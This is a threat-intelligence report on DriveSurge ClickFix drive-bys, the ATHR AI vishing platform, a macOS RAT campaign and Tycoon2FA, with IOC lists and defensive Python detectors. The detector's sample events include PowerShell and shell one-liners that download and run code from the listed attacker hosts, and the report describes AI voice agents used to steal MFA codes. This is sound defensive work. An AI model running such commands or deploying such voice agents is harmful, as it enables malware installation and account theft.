// DEEPFALCON SECURITY SERVICE — DAILY THREAT INTELLIGENCE REPORT | JUNE 2, 2026

Coverage Period: June 2, 2026  |  Focus: Phishing Campaigns · Native Tool / LotL Abuse  |  Sources: Microsoft Security · CISA · Talos · Proofpoint · CyberSecurityNews · BleepingComputer · The Hacker News


Generated: 2026-06-02

Companion: Daily Vulnerability Report (v1.3-DM)


Coverage-date counters (June 2, 2026 first-disclosure findings only):
Critical Threats: 0
High Threats: 0
🎣 Phishing: 0
🔧 LotL Abuse: 0
💼 BEC: 0
IOCs Available: 0
Total Findings: 0
Actors Identified: 0
Threat Landscape Summary — June 2, 2026

After exhaustive research across all 20 mandatory sources — including Microsoft Security Blog, CISA, Cisco Talos, Proofpoint, Cofense, CyberSecurityNews, BleepingComputer, The Hacker News, SecurityWeek, Dark Reading, Krebs on Security, Abnormal Security, Recorded Future, CrowdStrike, Mandiant, SentinelOne, Perception Point, and the Google Threat Intelligence Blog — no qualifying Category A (Phishing) or Category B (Native Tool/LotL Abuse) articles were first published on the coverage date of June 2, 2026.

The most significant recent threat actor disclosure is DriveSurge, a new Initial Access Broker using ClickFix and FakeUpdates drive-by attacks to compromise thousands of websites at scale. It was first published May 30, 2026 by SilentPush and picked up June 1, 2026 by CyberSecurityNews and BleepingComputer. This highly relevant finding is logged in the Follow-Up section below with full IOCs. Defenders should treat the DriveSurge IOC list as actionable intelligence and block the listed domains and IPs immediately regardless of the date gate. Additionally, the ATHR AI-powered vishing platform (first published April 16, 2026) remains an active threat against enterprise environments and is logged below with defensive guidance.

Coverage date findings: 0 (none qualifying)
Date gate, articles checked: 18+ articles
Articles excluded (prior date): 7 findings
Follow-up items logged: 5 campaigns
Highest-priority prior finding: DriveSurge IAB (June 1)
IOCs available (prior findings): Yes, DriveSurge IOC table
Active PhaaS platforms watch: Tycoon2FA · EvilTokens · ATHR
Detailed Findings — Sorted by Impact (Critical → High → Medium → Low)

No New First-Disclosure Findings for June 2, 2026

Exhaustive research across all 20 mandatory sources confirmed that no qualifying Category A (Phishing Campaigns) or Category B (Native Tool / LotL Abuse) articles were first published on the coverage date of June 2, 2026. The most recent major threat actor disclosure, DriveSurge (ClickFix/FakeUpdates IAB), was first published by SilentPush on May 30 and reached the mandatory sources on June 1, 2026, one day before the coverage date; it is documented in the Follow-Up Log below with full IOCs.

This reflects strict adherence to the date-gate rule (Section 1A, Rule 2): only articles whose first publication date is the coverage date qualify for full finding cards. The threat landscape remains highly active — see the Follow-Up Log for actionable intelligence from prior-date findings.

Category A: Phishing — 0 new findings
Category B: LotL Abuse — 0 new findings
Follow-Up Log: 5 prior campaigns tracked
MITRE ATT&CK TTP Consolidated View
Technique ID | Technique Name | Tactic | Observed In | Frequency
No TTPs recorded for June 2, 2026. See the Follow-Up Log for TTPs from prior-date findings, including DriveSurge (T1189, T1204.004, T1059.001) and ATHR (T1566.004, T1598.004, T1621).
Campaign Summary Table
Campaign / Incident Name | Category | Threat Actor | Target Platform | Target Sector | Impact Level | IOCs | First Reported | Priority Action
No qualifying campaigns for coverage date June 2, 2026. See Follow-Up Log below for prior-date campaigns including DriveSurge ClickFix/FakeUpdates IAB and ATHR vishing platform.
★ Exclusion Log & Follow-Up Campaigns — Research Findings Excluded by Date Gate
DriveSurge — Large-Scale ClickFix & FakeUpdates Initial Access Broker Compromises Thousands of Legitimate Websites
First published: May 30, 2026 — SilentPush (primary research); June 1, 2026 — CyberSecurityNews, BleepingComputer (06:14 PM)
Exclusion reason: All articles first published on May 30 and June 1, 2026 — prior to coverage date of June 2, 2026. No new materially different article published June 2.
Attack Category: Phishing (ClickFix social engineering) + LotL/Native Tool Abuse (PowerShell command execution via ClickFix)
Threat Actor: DriveSurge — newly identified Initial Access Broker (IAB) operating a Pay-Per-Install (PPI) model. Active since at least September 2025. Unattributed cluster.
Campaign Name: DriveSurge ClickFix/FakeUpdates Drive-By Campaign
Target Platforms: Windows (primary) and macOS (confirmed via cross-platform payload); all major browsers — Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, UC Browser
Target Sectors: Broad — any visitor to thousands of compromised high-reputation websites across all verticals
Technical Summary: DriveSurge injects malicious scripts into thousands of legitimate, high-reputation websites without the knowledge of the site owners. When a visitor lands on a compromised site, the hidden code routes the request through an open-source Traffic Distribution System (zTDS) that profiles the visitor (bot or human, OS, browser) and selects a lure. Bots and researchers receive the legitimate page.

In the FakeUpdates path, the visitor sees a convincing browser update prompt and downloads a ZIP containing DLLs and a malicious "Browser Update.exe". In the ClickFix path, a fake error message instructs the victim to copy a PowerShell command and paste it into the Run dialog or a PowerShell/terminal window, which silently installs the malware.

A failover mechanism cycles through multiple backup servers so the payload is still delivered when one domain goes offline, and a separate Advertisement Distribution System (ADS) collects device metadata and behavioral signals to confirm human presence before delivery. Cross-platform capability is confirmed: the macOS payload is a multi-stage shell command that downloads, executes, and self-deletes.
MITRE ATT&CK TTPs: T1189 (Drive-by Compromise; script injection into compromised legitimate sites), T1204.002 (User Execution: Malicious File; the "Browser Update.exe" dropper), T1204.004 (User Execution: Malicious Copy and Paste; ClickFix), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.004 (Command and Scripting Interpreter: Unix Shell; macOS stage), T1036.005 (Masquerading: Match Legitimate Name or Location), T1027 (Obfuscated Files or Information; Base64/string manipulation), T1568 (Dynamic Resolution; failover rotation across backup zTDS delivery servers)
Defensive Actions:
1. Block the DriveSurge IOC domains listed below in your web proxy and DNS filtering immediately.
2. Block IP 91[.]92[.]240[.]127 at the perimeter firewall; it is the confirmed ClickFix C2 and payload delivery address.
3. Warn staff never to paste commands into the Run dialog (Win+R), PowerShell, or Terminal because a web page told them to; no legitimate site fixes an error that way.
4. Install browser updates only through the browser's built-in update mechanism, never from a web page prompt or a downloaded ZIP.
5. Audit web-facing CMS platforms (WordPress and similar) for unauthorized script injections in page templates and theme files; the injected loader observed here is a t.js script pulled from beacontrace[.]bond.
6. Monitor for anomalous outbound connections from workstations to .icu, .bond, .shop, .live and .cfd TLDs.
7. Detect the ClickFix execution step itself: alert on powershell.exe, cmd.exe or mshta.exe spawned by explorer.exe (the Win+R path) with hidden-window, encoded or download-cradle arguments, and review HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU on suspect hosts, where commands entered in the Run dialog are recorded.
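Action 3 warns users; the check below catches the case where the warning fails. As an added example (not code from the report or from SilentPush), this Python scores normalised process-creation events for the ClickFix execution step the technical summary describes: an interpreter spawned from explorer.exe via the Run dialog, hidden-window and encoded arguments, a download cradle, and the macOS shell one-liner that downloads, executes and self-deletes. The event records, field names and Terminal parent names are assumptions; only the newtdsone[.]shop, testio[.]ecartdev[.]com and 91.92.240.127 values are taken from the report's IOC list, and every other host, path and package in the samples is invented.

```python
"""Score process-creation events for the ClickFix 'paste this command' pattern.
Added example, not code from the report. Events are constructed dicts in the shape
of a normalised process-creation record (Sysmon Event ID 1 or EDR telemetry); the
field names and the Terminal parent names are assumptions, not a vendor schema."""
import base64
import re

# Interpreters a ClickFix lure tells the victim to paste into. On Windows the Win+R
# Run dialog launches them as children of explorer.exe; the macOS variant seen by
# the report is a multi-stage shell one-liner typed into a terminal.
WINDOWS_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
MAC_HOSTS = {"sh", "bash", "zsh"}
RUN_DIALOG_PARENTS = {"explorer.exe"}
TERMINAL_PARENTS = {"terminal", "iterm2"}  # assumption: basename of the parent image

# (weight, reason, pattern) evaluated over the lower-cased, decoded command line.
INDICATORS = [
    (3, "download-cradle", re.compile(
        r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|curl|wget)\b")),
    (2, "hidden-window", re.compile(r"-w(indowstyle)?\s+hidden")),
    (2, "encoded-command", re.compile(r"-e(nc|ncodedcommand)?\b")),
    (2, "pipe-to-shell", re.compile(r"\|\s*(sh|bash|zsh)\b")),
    (1, "policy-bypass", re.compile(r"-(ep|executionpolicy)\s+bypass")),
    (1, "self-delete", re.compile(r"\brm\s+-r?f\b")),
    (1, "mshta-url", re.compile(r"\bmshta(\.exe)?\s+https?://")),
]
THRESHOLD = 4
ENC_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()

def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    indicators see the real command rather than an opaque blob."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def score_event(event: dict):
    """Return (score, reasons). Lineage alone is never enough: an admin opening
    PowerShell from Win+R scores 3 and stays below THRESHOLD."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = decode_encoded_command(event["command_line"]).lower()
    score, reasons = 0, []
    if image in WINDOWS_HOSTS and parent in RUN_DIALOG_PARENTS:
        score, reasons = 3, ["interpreter-from-run-dialog"]
    elif image in MAC_HOSTS and parent in TERMINAL_PARENTS:
        score, reasons = 2, ["shell-from-terminal"]
    for weight, reason, pattern in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(reason)
    return score, reasons

def detect(events, threshold=THRESHOLD):
    """(event id, score, reasons) for every event at or above the threshold."""
    flagged = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            flagged.append((event["id"], score, reasons))
    return flagged

# Constructed sample telemetry. newtdsone.shop, testio.ecartdev.com and
# 91.92.240.127 are the report's IOCs; everything else is invented.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode(
    'IEX (New-Object Net.WebClient).DownloadString("http://91.92.240.127/a")'.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -nop -c "iex (irm https://newtdsone.shop/x)"'},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -NoProfile -Command Get-ChildItem"},  # admin via Win+R
    {"id": 4, "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},  # scheduled task
    {"id": 5, "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/sh",
     "command_line": "sh -c 'curl -s https://testio.ecartdev.com/m.sh -o /tmp/.u && chmod +x /tmp/.u && /tmp/.u; rm -f /tmp/.u'"},
]

if __name__ == "__main__":
    for event_id, score, reasons in detect(SAMPLE_EVENTS):
        print(event_id, score, ", ".join(reasons))
```

Events 1, 2 and 5 cross the threshold; event 3 (an administrator opening PowerShell from Win+R) scores only on lineage and is left alone, which is the point of weighting command-line content rather than alerting on explorer.exe spawning powershell.exe by itself. Decoding -EncodedCommand before matching matters because the cradle in event 2 is invisible in the raw command line; a production rule would add the RunMRU registry artefact as a second corroborating source.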
▶ IOCs — DriveSurge (Source: SilentPush / CyberSecurityNews June 1, 2026) — DEFANGED
Type | Indicator (Defanged) | Description
Domain | beacontrace[.]bond | Malicious zTDS inject domain serving the t.js script
Domain | jclforwarding[.]com | Compromised site serving FakeUpdates/ClickFix content
Domain | check[.]first-node[.]rocks | Serves fake Mozilla Firefox update page
Domain | cptoptious[.]com | zTDS delivery domain (obfuscated payload)
Domain | newtdsone[.]shop | zTDS delivery domain (obfuscated payload)
Domain | captioto[.]com | zTDS delivery domain (obfuscated payload)
Domain | banerpanel[.]live | Advertisement Distribution System (ADS) panel domain
Domain | testio[.]ecartdev[.]com | Payload and development server
Domain | ycyfugihih[.]cfd | DriveSurge registration email pivot domain
Domain | brightson[.]icu | Pre-weaponized DriveSurge infrastructure
Domain | coverlink[.]icu | Pre-weaponized DriveSurge infrastructure
Domain | datumprobe[.]icu | Pre-weaponized DriveSurge infrastructure
Domain | webgleam[.]info | Fingerprint 3 infrastructure pattern domain
Domain | cptoptions[.]com | Suspicious domain loaded into jclforwarding[.]com
IP | 91[.]92[.]240[.]127 | Confirmed ClickFix C2 and malicious code delivery IP
Email | thiagorivera197151[@]ycyfugihih[.]cfd | DriveSurge domain registration email (Fingerprint 6 pivot)
⚠ All indicators defanged for safety. Refang before use in security tooling. Verify against primary source before blocking in production.
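Defensive actions 1, 5 and 6 above and the refang caveat just stated can be turned into one repeatable sweep. The following Python is an added example written for this report, not code from SilentPush or from any tooling the report describes: it refangs the IOC table, builds domain and IP blocklists, then checks constructed Squid-style proxy log lines and a constructed CMS page template for IOC hosts, watched TLDs and external scripts that are not on the site's allow-list. The log lines, the HTML and the hosts cheapdeals.icu and static.clientcdn.example are invented for the demonstration; the indicators are the report's.

```python
"""Refang the DriveSurge IOC table and sweep proxy logs and CMS templates for hits.
Added example, not code from the report or from SilentPush. Indicator values are
copied from the report's defanged table; the log lines, HTML snippet and the hosts
cheapdeals.icu / static.clientcdn.example are constructed for the demo."""
import ipaddress
import re
from urllib.parse import urlsplit

IOC_DOMAINS = """beacontrace[.]bond jclforwarding[.]com check[.]first-node[.]rocks
cptoptious[.]com newtdsone[.]shop captioto[.]com banerpanel[.]live
testio[.]ecartdev[.]com ycyfugihih[.]cfd brightson[.]icu coverlink[.]icu
datumprobe[.]icu webgleam[.]info cptoptions[.]com""".split()
RAW_IOCS = [("domain", d) for d in IOC_DOMAINS] + [
    ("ip", "91[.]92[.]240[.]127"),
    ("email", "thiagorivera197151[@]ycyfugihih[.]cfd"),
]
WATCH_TLDS = {"icu", "bond", "shop", "live", "cfd"}  # report's defensive action 6

def refang(indicator: str) -> str:
    """Reverse common defanging: [.] (.) {.} -> '.', [@] -> '@', hxxp -> http."""
    s = indicator.strip()
    for token in ("[.]", "(.)", "{.}"):
        s = s.replace(token, ".")
    s = s.replace("[@]", "@").replace("[:]", ":")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I).lower()

def build_blocklists(raw_iocs):
    """Return (domains, ips) sets ready for DNS RPZ / proxy / firewall import."""
    domains, ips = set(), set()
    for kind, value in raw_iocs:
        v = refang(value)
        if kind == "domain":
            domains.add(v)
        elif kind == "ip":
            ips.add(str(ipaddress.ip_address(v)))  # rejects a malformed address
        elif kind == "email":
            domains.add(v.split("@", 1)[1])  # the registrant mail domain is an IOC too
    return domains, ips

def host_of(url: str) -> str:
    # Squid logs CONNECT requests as bare host:port, so supply a scheme-less '//'.
    return (urlsplit(url if "://" in url else "//" + url).hostname or "").rstrip(".")

def classify_host(host: str, domains, ips):
    """'ioc-ip', 'ioc-domain' (exact or subdomain match), 'watch-tld', or None."""
    host = host.lower()
    if host in ips:
        return "ioc-ip"
    if any(host == d or host.endswith("." + d) for d in domains):
        return "ioc-domain"
    if host.rsplit(".", 1)[-1] in WATCH_TLDS:
        return "watch-tld"
    return None

def scan_proxy_log(lines, domains, ips):
    """Squid native access.log: client address is field 3, request URL is field 7."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 7:
            verdict = classify_host(host_of(parts[6]), domains, ips)
            if verdict:
                hits.append((verdict, parts[2], parts[6]))
    return hits

SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)

def scan_template(html: str, domains, ips, allowed_hosts):
    """CMS template audit (defensive action 5): flag external <script src> hosts that
    are IOCs, sit on a watched TLD, or are simply not on the site's allow-list."""
    findings = []
    for src in SCRIPT_SRC.findall(html):
        host = host_of(src)
        if not host:
            continue  # relative, same-origin script
        verdict = classify_host(host, domains, ips)
        if verdict is None and host not in allowed_hosts:
            verdict = "unlisted-host"
        if verdict:
            findings.append((verdict, src))
    return findings

# Constructed sample data (not real traffic; 10.0.0.x, 192.0.2.x, 203.0.113.x are private/test ranges).
SAMPLE_LOG = [
    "1780400000.123 45 10.0.0.15 TCP_MISS/200 2310 GET https://beacontrace.bond/t.js - HIER_DIRECT/91.92.240.127 application/javascript",
    "1780400001.456 80 10.0.0.15 TCP_MISS/200 51200 GET http://91.92.240.127/dl/Browser%20Update.zip - HIER_DIRECT/91.92.240.127 application/zip",
    "1780400002.789 30 10.0.0.22 TCP_MISS/200 900 GET https://www.example.com/index.html - HIER_DIRECT/192.0.2.10 text/html",
    "1780400003.012 60 10.0.0.31 TCP_TUNNEL/200 0 CONNECT promo.cheapdeals.icu:443 - HIER_DIRECT/203.0.113.9 -",
]
SAMPLE_TEMPLATE = """<html><head>
<script src="/assets/site.js"></script>
<script src="https://static.clientcdn.example/jquery.min.js"></script>
<script type="text/javascript" src='https://beacontrace.bond/t.js'></script>
</head><body>...</body></html>"""

def demo():
    """Run both sweeps over the constructed samples; returns (proxy_hits, template_hits)."""
    domains, ips = build_blocklists(RAW_IOCS)
    return (scan_proxy_log(SAMPLE_LOG, domains, ips),
            scan_template(SAMPLE_TEMPLATE, domains, ips, {"static.clientcdn.example"}))

if __name__ == "__main__":
    for hit in demo()[0] + demo()[1]:
        print(*hit)
```

The subdomain match in classify_host is deliberate: the report lists apex domains, while the injected loader and zTDS redirects are served from hostnames under them. The watch-TLD verdict is a lower-confidence signal for triage, not a block decision, and the refang step is exactly the one the caveat above requires before any of these values reach production tooling.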
References: SilentPush Primary Research — May 30, 2026 · CyberSecurityNews — June 1, 2026 · BleepingComputer — June 1, 2026
EXCLUDED — DATE GATE: May 30 / June 1 articles
IOCs: ACTIONABLE — BLOCK NOW
ATHR — AI-Powered Vishing Platform Automates Full TOAD Attack Chain Including AI Voice Agents
First published: April 16, 2026 — BleepingComputer (Abnormal Security research)
Exclusion reason: Article first published April 16, 2026 — 47 days prior to coverage date. No new coverage-date article with materially new technical detail.
Summary: ATHR is a commercial cybercrime platform sold on underground forums for $4,000 plus a 10% commission. It automates the complete Telephone-Oriented Attack Delivery (TOAD) chain, from spoofed phishing emails to AI voice agent calls, targeting Google, Microsoft, Coinbase, Binance, Gemini, Crypto.com, Yahoo, and AOL accounts. Lure emails mimic security alerts and carry a phone number to call. When the victim calls, the platform routes the call through Asterisk/WebRTC to an AI voice agent driven by carefully crafted prompts that simulate an account recovery process, and six-digit verification codes are extracted in real time. The platform provides a dashboard for email distribution, call management, credential harvesting, and real-time outcome monitoring, so a single operator can run the full attack chain from a browser. Researchers recorded over 600,000 daily TOAD attacks at peak volume in 2025.
MITRE ATT&CK TTPs: T1566.002 (Phishing: Spearphishing Link; email lure), T1566.004 (Phishing: Spearphishing Voice; callback number embedded in the lure), T1598.004 (Phishing for Information: Spearphishing Voice; the AI vishing call), T1621 (Multi-Factor Authentication Request Generation; real-time verification code theft)
Defensive Actions:
1. Train staff to never provide MFA codes or verification codes to inbound callers regardless of urgency.
2. Flag emails containing phone numbers as high-risk — apply enhanced filtering and user warnings.
3. Verify caller identity through an official callback to the organization's known published number.
Reference: BleepingComputer — April 16, 2026
EXCLUDED — DATE GATE: April 16 article
JINX-0164 — LinkedIn Social Engineering Campaign Targets Crypto Developers with Custom macOS RAT (AUDIOFIX / MINIRAT)
First published: May 29, 2026 — CyberSecurityNews; May 28–29, 2026 — Wiz.io (primary), The Hacker News
Exclusion reason: Article first published May 28–29, 2026 — prior to coverage date. No new June 2 article.
Summary: JINX-0164 is a financially motivated threat actor active since at least mid-2025, targeting cryptocurrency organizations with convincing LinkedIn profiles that pose as recruiters or business contacts. Victims receive fake meeting invitations linking to lookalike teleconference domains (Microsoft Teams, Slack and Aircall impersonators) that trigger the download of a macOS RAT. The custom Python RAT AUDIOFIX performs broad automated data theft, and a Go-based backdoor, MINIRAT, provides persistent remote access. In April 2026, JINX-0164 escalated to supply chain attacks by trojanizing version 4.9.1 of the npm package @velora-dex/sdk. The cluster shares techniques with North Korean groups (UNC1069/Sleet), but there is no confirmed attribution or infrastructure overlap.
Confirmed IOCs: apple.driver-store[.]com (fake driver store RAT delivery); apple.driver-update[.]io (AUDIOFIX dropper domain); @velora-dex/sdk v4.9.1 (trojanized npm package — do not install)
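The npm IOC above is easy to miss if you only read the top-level package.json: the trojanized release can arrive transitively under another dependency, and a caret range can pull it in on the next clean install even when the current tree is fine. The following Python is an added example, not code from Wiz or from the report; it walks npm lockfiles (the nested v1 format and the flat v2/v3 "packages" map) for @velora-dex/sdk 4.9.1 and flags manifest ranges that would still accept it. The lockfile and manifest contents, the wallet-connect-shim and chart-widgets package names and the 4.9.0 version are constructed placeholders; only 4.9.1 is the version the report identifies as trojanized.

```python
"""Find the trojanized @velora-dex/sdk 4.9.1 in npm lockfiles and manifests.
Added example, not code from the report or from Wiz. The package name and version
come from the report's IOC line; the lockfiles and package.json below are
constructed, and wallet-connect-shim / chart-widgets / 4.9.0 are placeholders."""
from typing import Iterator

BAD_PACKAGES = {"@velora-dex/sdk": {"4.9.1"}}  # name -> trojanized versions

def _parse(version: str) -> tuple:
    return tuple(int(x) for x in version.split("-", 1)[0].split("."))

def range_allows(spec: str, version: str) -> bool:
    """Minimal semver check for the forms common in package.json: exact, ~x.y.z,
    ^x.y.z and '*'/'latest'. Anything else counts as 'could resolve' so it is
    surfaced for review rather than silently passed."""
    spec = spec.strip()
    if spec in ("", "*", "latest"):
        return True
    try:
        target = _parse(version)
        if spec[0] in "~^":
            base = _parse(spec[1:])
            if target < base:
                return False
            if spec[0] == "~" or base[0] == 0:
                return target[:2] == base[:2]
            return target[0] == base[0]
        return _parse(spec) == target
    except ValueError:
        return True

def iter_lock_packages(lock: dict) -> Iterator[tuple]:
    """Yield (name, version, path). lockfileVersion 2/3 carry a flat 'packages'
    map keyed by node_modules path; v1 nests 'dependencies' (v2 has both, so
    'packages' wins to avoid double reporting)."""
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if path and "version" in meta:
                yield path.rsplit("node_modules/", 1)[-1], meta["version"], path
        return
    def walk(deps: dict, prefix: str):
        for name, meta in deps.items():
            path = f"{prefix}node_modules/{name}"
            if "version" in meta:
                yield name, meta["version"], path
            yield from walk(meta.get("dependencies", {}), path + "/")
    yield from walk(lock.get("dependencies", {}), "")

def find_trojanized(lock: dict) -> list:
    """Locked occurrences of a trojanized release, including transitive ones."""
    return [(n, v, p) for n, v, p in iter_lock_packages(lock) if v in BAD_PACKAGES.get(n, ())]

def find_exposed_ranges(manifest: dict) -> list:
    """package.json ranges that would pull a trojanized release on a fresh install
    without a lockfile (e.g. '^4.9.0' accepts 4.9.1)."""
    out = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if any(range_allows(spec, bad) for bad in BAD_PACKAGES.get(name, ())):
                out.append((section, name, spec))
    return out

# Constructed samples. The top-level install is pinned to a placeholder clean
# version; the bad release hides one level down under a placeholder dependency,
# which is exactly where a grep of package.json would miss it.
SAMPLE_LOCK_V3 = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "trading-ui", "version": "0.1.0"},
        "node_modules/@velora-dex/sdk": {"version": "4.9.0"},
        "node_modules/wallet-connect-shim": {"version": "1.2.0"},
        "node_modules/wallet-connect-shim/node_modules/@velora-dex/sdk": {"version": "4.9.1"},
    },
}
SAMPLE_LOCK_V1 = {
    "lockfileVersion": 1,
    "dependencies": {
        "wallet-connect-shim": {"version": "1.2.0",
                                "dependencies": {"@velora-dex/sdk": {"version": "4.9.1"}}},
    },
}
SAMPLE_MANIFEST = {"dependencies": {"@velora-dex/sdk": "^4.9.0", "chart-widgets": "2.0.1"}}

if __name__ == "__main__":
    for lock in (SAMPLE_LOCK_V3, SAMPLE_LOCK_V1):
        print("installed:", find_trojanized(lock))
    print("exposed ranges:", find_exposed_ranges(SAMPLE_MANIFEST))
```

Both lockfile shapes report the same nested hit, and the manifest check shows why removing the locked copy is not enough: a "^4.9.0" range resolves to 4.9.1 again on the next install without a lockfile, so the fix is to pin below the trojanized release or above a verified clean one, and to run the lockfile check in CI on every build.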
Reference: Wiz.io Primary Research · CyberSecurityNews — May 29, 2026
EXCLUDED — DATE GATE: May 28–29 articles
DriveSurge — Syndicated Follow-Up Coverage (TechRadar, Muck Rack — June 2, 2026)
Note: TechRadar and several aggregators published DriveSurge coverage on June 2, 2026, approximately 4 hours before our research window. BleepingComputer's primary article was timestamped June 1, 2026 at 06:14 PM ET, and the TechRadar piece is syndicated coverage of the same SilentPush report: it adds no materially new technical detail, IOCs, or threat actor attribution beyond the June 1 articles. Per the Section 1A Rule 2 exception criteria, it does not qualify for a full finding card because the originating research (SilentPush, May 30; BleepingComputer, June 1) is prior-date and no new material was added.
No new IOCs added by TechRadar coverage.
EXCLUDED — Follow-up syndication, no new material detail
Tycoon2FA PhaaS — Post-Disruption Infrastructure Migration & Q1 2026 Phishing Landscape Context
First published: April 30, 2026 — Microsoft Security Blog (Q1 2026 Email Threat Landscape); March 4, 2026 — Microsoft (Inside Tycoon2FA analysis)
Exclusion reason: Articles first published April 30 and March 4, 2026. No new June 2 article.
Current status: Following March 2026 coordinated disruption by Microsoft DCU and law enforcement, Tycoon2FA operators have migrated hosting and domain registration patterns. January 2026 volume was 54% below December 2025. February 2026 saw a 44% surge before the March disruption drove a 15% volume decrease. Platform now operating with distributed infrastructure to restore anti-analysis protections. 8.3 billion email phishing threats detected in Q1 2026. QR code phishing doubled over Q1 2026, emerging as fastest-growing attack vector.
Defender note: Do not assume Tycoon2FA is neutralised. Monitor for resumed campaigns from new hosting infrastructure across your email security tooling.
Reference: Microsoft Security Blog — April 30, 2026 · Microsoft Security Blog — March 4, 2026
FOLLOW-UP — Prior campaign; infrastructure migration context